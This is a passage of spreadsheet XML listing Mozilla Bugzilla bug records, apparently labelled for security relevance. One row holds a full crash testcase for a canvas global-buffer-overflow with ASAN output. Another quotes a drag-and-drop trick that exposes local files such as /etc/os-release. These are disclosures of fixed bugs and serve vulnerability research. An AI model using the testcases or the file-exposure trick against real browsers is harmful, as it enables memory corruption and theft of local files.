        </is>
      </c>
      <c r="O4501" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4501" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main66+]</t>
        </is>
      </c>
      <c r="Q4501" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4501" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4501" t="inlineStr">
        <is>
          <t>Firefox 67</t>
        </is>
      </c>
      <c r="T4501" t="n">
        <v>1</v>
      </c>
      <c r="U4501" t="n">
        <v>0</v>
      </c>
      <c r="V4501" t="n">
        <v>26</v>
      </c>
      <c r="W4501" t="inlineStr">
        <is>
          <t>Created attachment 9041441
screencast issue.gif
[Affected versions]: 
- 67.0a1 (2019-02-04)
- 66.0b5 (20190204181317)
- 65.0 (20190124174741)
[Affected platforms]:
- Windows 10 x64
[Steps to reproduce]:
1. Setup a simple FTP server 
2. Use the following [test case](https://drive.google.com/open?id=1PMivz7O8s91_-K7EKY4dScFx7qbglyB9) 
3. Access the above test case via FTP server
[Expected result]:
- The auth prompt should not be displayed once more. 
[Actual result]:
- Auth prompt is successively displayed, without any means to be dismissed.
[Regression range]: 
- Not a regression, I can see this issue way back to Fx 31.0a1.
[Additional Notes]:
- Firefox can’t be escaped, only by ending its process. 
- This behavior is not reproducible on Chrome. 
- In order to create the FTP server, I used FileZilla.</t>
        </is>
      </c>
      <c r="X4501" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4502">
      <c r="A4502" t="n">
        <v>1287316</v>
      </c>
      <c r="B4502" t="inlineStr">
        <is>
          <t>2016-07-17 01:32:34 -0700</t>
        </is>
      </c>
      <c r="C4502" t="inlineStr">
        <is>
          <t>global-buffer-overflow in mozilla::gfx::FilterSupport::ComputeSourceNeededRegions</t>
        </is>
      </c>
      <c r="D4502" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:23 -0700</t>
        </is>
      </c>
      <c r="E4502" t="n">
        <v>1</v>
      </c>
      <c r="F4502" t="n">
        <v>1</v>
      </c>
      <c r="G4502" t="n">
        <v>3</v>
      </c>
      <c r="H4502" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4502" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4502" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K4502" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L4502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4502" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4502" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4502" t="inlineStr">
        <is>
          <t>[adv-main49+]</t>
        </is>
      </c>
      <c r="Q4502" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4502" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4502" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T4502" t="n">
        <v>1</v>
      </c>
      <c r="U4502" t="n">
        <v>0</v>
      </c>
      <c r="V4502" t="n">
        <v>50</v>
      </c>
      <c r="W4502" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (BuildID=20160711143746) as follows:
&lt;script&gt;
function start() {
        o0=document;
        o13=(new DOMParser()).parseFromString('','text/html');
        o14=o13.all[0];
        o80=document.createElement('canvas');
        o14.innerHTML='&lt;svg style&gt;&lt;filter&gt;&lt;feConvolveMatrix&gt;';
        o133=o14.querySelectorAll('*')[2];
        o134=o14.querySelectorAll('*')[3];
        o254=o80.getContext('2d',{willReadFrequently: true,});
        o134.id='id14';
        try{while(document.removeChild(document.firstChild));}catch(e){}
        o298=document.implementation.createHTMLDocument();
        o298.body.appendChild(o133);
        document.appendChild(o298.documentElement);
        o254.filter=' url(#id14) url(#id14) ';
        o0.write('&lt;html&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;');
        o254.fillRect(545259505,-1,8200,14942208);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==18075==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f229cbe8f90 at pc 0x00000049df78 bp 0x7ffdcea2c650 sp 0x7ffdcea2be10
WRITE of size 16 at 0x7f229cbe8f90 thread T0 (Web Content)
    #0 0x49df77 in __asan_memcpy /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393:3
    #1 0x7f2297a0f642 in _moz_pixman_region32_copy /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/cairo/libpixman/src/pixman-region.c:523:25
    #2 0x7f22909da2b4 in Copy /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/src/nsRegion.h:414:5
    #3 0x7f22909da2b4 in operator= /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/src/nsRegion.h:77
    #4 0x7f22909da2b4 in operator= /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/src/nsRegion.h:487
    #5 0x7f22909da2b4 in operator= /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/src/nsRegion.h:842
    #6 0x7f22909da2b4 in mozilla::gfx::FilterSupport::ComputeSourceNeededRegions(mozilla::gfx::FilterDescription const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt;&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt;&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt;&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/src/FilterSupport.cpp:1774
    #7 0x7f22935402f5 in mozilla::dom::AdjustedTargetForFilter::AdjustedTargetForFilter(mozilla::dom::CanvasRenderingContext2D*, mozilla::gfx::DrawTarget*, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::CompositionOp) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:353:5
    #8 0x7f22934a3c76 in MakeUnique&lt;mozilla::dom::AdjustedTargetForFilter, mozilla::dom::CanvasRenderingContext2D *&amp;, RefPtr&lt;mozilla::gfx::DrawTarget&gt; &amp;, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; &amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; &amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::CompositionOp &amp;&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/gfx/gl/../../mfbt/UniquePtr.h:680:27
    #9 0x7f22934a3c76 in mozilla::dom::AdjustedTarget::AdjustedTarget(mozilla::dom::CanvasRenderingContext2D*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:613
    #10 0x7f22934a266a in mozilla::dom::CanvasRenderingContext2D::FillRect(double, double, double, double) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContext2D.cpp:2814:3
    #11 0x7f22925ec2fd in mozilla::dom::CanvasRenderingContext2DBinding::fillRect(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3185:3
    #12 0x7f22933d3c07 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2784:13
    #13 0x7f22992b36db in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:232:15
    #14 0x7f22992b36db in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:441
    #15 0x7f229929a662 in CallFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:504:12
    #16 0x7f229929a662 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #17 0x7f229928103b in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #18 0x7f22992b3d80 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:471:15
    #19 0x7f22992b43f1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:517:10
    #20 0x7f2298df8898 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2839:12
    #21 0x7f2292ee8540 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #22 0x7f229381e97b in Call&lt;nsISupports *&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #23 0x7f229381e97b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/JSEventHandler.cpp:214
    #24 0x7f22937ebb6f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventListenerManager.cpp:1116:16
    #25 0x7f22937ed6ed in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventListenerManager.cpp:1288:17
    #26 0x7f22937c910c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventDispatcher.cpp:379:5
    #27 0x7f22937cd470 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/events/EventDispatcher.cpp:710:9
    #28 0x7f22958ebd65 in nsDocumentViewer::LoadComplete(nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsDocumentViewer.cpp:996:7
    #29 0x7f229664ccd1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7577:5
    #30 0x7f2296648d01 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7378:7
    #31 0x7f229664ff7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/docshell/base/nsDocShell.cpp:7275:13
    #32 0x7f22906a3ba1 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:1252:3
    #33 0x7f22906a2c54 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:836:5
    #34 0x7f229069fadc in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:726:9
    #35 0x7f22906a1bb4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:608:5
    #36 0x7f22906a26ac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/uriloader/base/nsDocLoader.cpp:464:14
    #37 0x7f228ea7f79b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #38 0x7f229159136f in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsDocument.cpp:9256:7
    #39 0x7f22915d5e8f in nsUnblockOnloadEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsDocument.cpp:9209:5
    #40 0x7f228e8ac996 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1073:7
    #41 0x7f228e92ad3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #42 0x7f228f671a1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #43 0x7f228f5e62e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #44 0x7f228f5e62e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #45 0x7f228f5e62e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #46 0x7f229503987f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #47 0x7f22970bf8a7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:837:12
    #48 0x7f228f5e62e8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #49 0x7f228f5e62e8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #50 0x7f228f5e62e8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #51 0x7f22970bef43 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:667:7
    #52 0x4e2c05 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #53 0x7f228b95782f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #54 0x41e7b8 in _start (/home/nils/fuzzer3/firefox/plugin-container+0x41e7b8)
0x7f229cbe8f90 is located 16 bytes to the left of global variable 'nsTArrayHeader::sEmptyHdr' defined in '/builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsTArray.cpp:13:32' (0x7f229cbe8fa0) of size 8
0x7f229cbe8f90 is located 40 bytes to the right of global variable 'sStderrCallback' defined in '/builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsCRTGlue.cpp:316:23' (0x7f229cbe8f60) of size 8
SUMMARY: AddressSanitizer: global-buffer-overflow /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393:3 in __asan_memcpy
Shadow bytes around the buggy address:
  0x0fe4d39751a0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9
  0x0fe4d39751b0: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0fe4d39751c0: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0fe4d39751d0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0fe4d39751e0: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
=&gt;0x0fe4d39751f0: f9 f9[f9]f9 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0fe4d3975200: 00 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0fe4d3975210: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0fe4d3975220: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9
  0x0fe4d3975230: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0fe4d3975240: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9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8075==ABORTING</t>
        </is>
      </c>
      <c r="X4502" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4503">
      <c r="A4503" t="n">
        <v>1800425</v>
      </c>
      <c r="B4503" t="inlineStr">
        <is>
          <t>2022-11-14 01:33:46 -0800</t>
        </is>
      </c>
      <c r="C4503" t="inlineStr">
        <is>
          <t>Arbitrary file exposure with Drag&amp;Drop on GTK (maybe only across Firefox instances?)</t>
        </is>
      </c>
      <c r="D4503" t="inlineStr">
        <is>
          <t>2023-07-17 13:34:15 -0700</t>
        </is>
      </c>
      <c r="E4503" t="n">
        <v>1</v>
      </c>
      <c r="F4503" t="n">
        <v>1</v>
      </c>
      <c r="G4503" t="n">
        <v>3</v>
      </c>
      <c r="H4503" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4503" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4503" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K4503" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4503" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4503" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4503" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4503" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4503" t="inlineStr">
        <is>
          <t>[adv-main109+][adv-esr102.7+]</t>
        </is>
      </c>
      <c r="Q4503" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4503" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4503" t="inlineStr">
        <is>
          <t>110 Branch</t>
        </is>
      </c>
      <c r="T4503" t="n">
        <v>1</v>
      </c>
      <c r="U4503" t="n">
        <v>0</v>
      </c>
      <c r="V4503" t="n">
        <v>17</v>
      </c>
      <c r="W4503" t="inlineStr">
        <is>
          <t>Created attachment 9303254
dnd.html
The GTK drag&amp;drop code treats all text/plain MIMEs containing file URLs as files being dragged: https://searchfox.org/mozilla-central/source/widget/gtk/nsDragService.cpp#789-792.
This makes it highly trivial for websites to do something like `dt.setData('text/plain', 'file:///etc/os-release')` and for GTK to treat this as an actual file being dragged.
The easiest way to reproduce this to have two running Firefox instances, one with attached test case and another with something like https://evercoder.github.io/clipboard-inspector/. Dragging from the test case in one instance to the clipboard inspect in another should show the file instead of the text.
I haven't verified yet, if it possible somehow to do this in a single Firefox instance.</t>
        </is>
      </c>
      <c r="X4503" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4504">
      <c r="A4504" t="n">
        <v>290407</v>
      </c>
      <c r="B4504" t="inlineStr">
        <is>
          <t>2005-04-14 18:31:57 -0700</t>
        </is>
      </c>
      <c r="C4504" t="inlineStr">
        <is>
          <t>Fix up bz_alter_column and break out a bz_alter_column_raw</t>
        </is>
      </c>
      <c r="D4504" t="inlineStr">
        <is>
          <t>2005-04-17 00:29:14 -0700</t>
        </is>
      </c>
      <c r="E4504" t="n">
        <v>1</v>
      </c>
      <c r="F4504" t="n">
        <v>1</v>
      </c>
      <c r="G4504" t="n">
        <v>4</v>
      </c>
      <c r="H4504" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4504" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4504" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K4504" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L4504" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4504" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4504" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4504" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4504" t="inlineStr"/>
      <c r="Q4504" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4504" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4504" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4504" t="n">
        <v>1</v>
      </c>
      <c r="U4504" t="n">
        <v>0</v>
      </c>
      <c r="V4504" t="n">
        <v>9</v>
      </c>
      <c r="W4504" t="inlineStr">
        <is>
          <t>bz_alter_column has a slight bug, in that we need to move its current NOT NULL
check into the inside of its "if" block. (That will make sense once you see the
patch.)
Also, we need a bz_alter_column_raw for bug 285722.</t>
        </is>
      </c>
      <c r="X4504" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4505">
      <c r="A4505" t="n">
        <v>1845739</v>
      </c>
      <c r="B4505" t="inlineStr">
        <is>
          <t>2023-07-27 07:08:26 -0700</t>
        </is>
      </c>
      <c r="C4505" t="inlineStr">
        <is>
          <t>WebExtension can open Internal pages using windows.create</t>
        </is>
      </c>
      <c r="D4505" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:01 -0700</t>
        </is>
      </c>
      <c r="E4505" t="n">
        <v>1</v>
      </c>
      <c r="F4505" t="n">
        <v>1</v>
      </c>
      <c r="G4505" t="n">
        <v>3</v>
      </c>
      <c r="H4505" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4505" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J4505" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4505" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4505" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4505" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4505" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main119+][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q4505" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4505" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4505" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T4505" t="n">
        <v>1</v>
      </c>
      <c r="U4505" t="n">
        <v>0</v>
      </c>
      <c r="V4505" t="n">
        <v>30</v>
      </c>
      <c r="W4505" t="inlineStr">
        <is>
          <t>Created attachment 9346039
poc.zip
Using the browser.windows.open() function, a malicious WebExtension can open privileged pages like addons, about, etc., without any restrictions.
Steps to Reproduce:
1. Download and extract poc.zip to a folder
2. Open the Firefox browser and load the extracted files as WebExtention about:debugging#/runtime/this-firefox to begin testing.</t>
        </is>
      </c>
      <c r="X4505" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4506">
      <c r="A4506" t="n">
        <v>1105800</v>
      </c>
      <c r="B4506" t="inlineStr">
        <is>
          <t>2014-11-27 08:37:15 -0800</t>
        </is>
      </c>
      <c r="C4506" t="inlineStr">
        <is>
          <t>Treeherder missing job completion data for Try pushes</t>
        </is>
      </c>
      <c r="D4506" t="inlineStr">
        <is>
          <t>2015-01-23 15:04:02 -0800</t>
        </is>
      </c>
      <c r="E4506" t="n">
        <v>1</v>
      </c>
      <c r="F4506" t="n">
        <v>1</v>
      </c>
      <c r="G4506" t="n">
        <v>7</v>
      </c>
      <c r="H4506" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4506" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4506" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K4506" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4506" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4506" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4506" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4506" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4506" t="inlineStr"/>
      <c r="Q4506" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4506" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4506" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4506" t="n">
        <v>1</v>
      </c>
      <c r="U4506" t="n">
        <v>0</v>
      </c>
      <c r="V4506" t="n">
        <v>11</v>
      </c>
      <c r="W4506" t="inlineStr">
        <is>
          <t>I pushed off a bunch of uplift simulation Try pushes last night, and Treeherder shows them as all running still. TBPL and buildapi correctly show them as completed.
https://treeherder.mozilla.org/ui/#/jobs?repo=try&amp;revision=48296352efb7
https://tbpl.mozilla.org/?tree=Try&amp;rev=48296352efb7</t>
        </is>
      </c>
      <c r="X4506" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4507">
      <c r="A4507" t="n">
        <v>840882</v>
      </c>
      <c r="B4507" t="inlineStr">
        <is>
          <t>2013-02-12 22:56:53 -0800</t>
        </is>
      </c>
      <c r="C4507" t="inlineStr">
        <is>
          <t>Homograph attack prevention is incomplete</t>
        </is>
      </c>
      <c r="D4507" t="inlineStr">
        <is>
          <t>2024-02-14 13:05:34 -0800</t>
        </is>
      </c>
      <c r="E4507" t="n">
        <v>1</v>
      </c>
      <c r="F4507" t="n">
        <v>1</v>
      </c>
      <c r="G4507" t="n">
        <v>6</v>
      </c>
      <c r="H4507" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4507" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4507" t="inlineStr">
        <is>
          <t>Networking: Domain Lists</t>
        </is>
      </c>
      <c r="K4507" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4507" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4507" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4507" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4507" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4507" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q4507" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4507" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
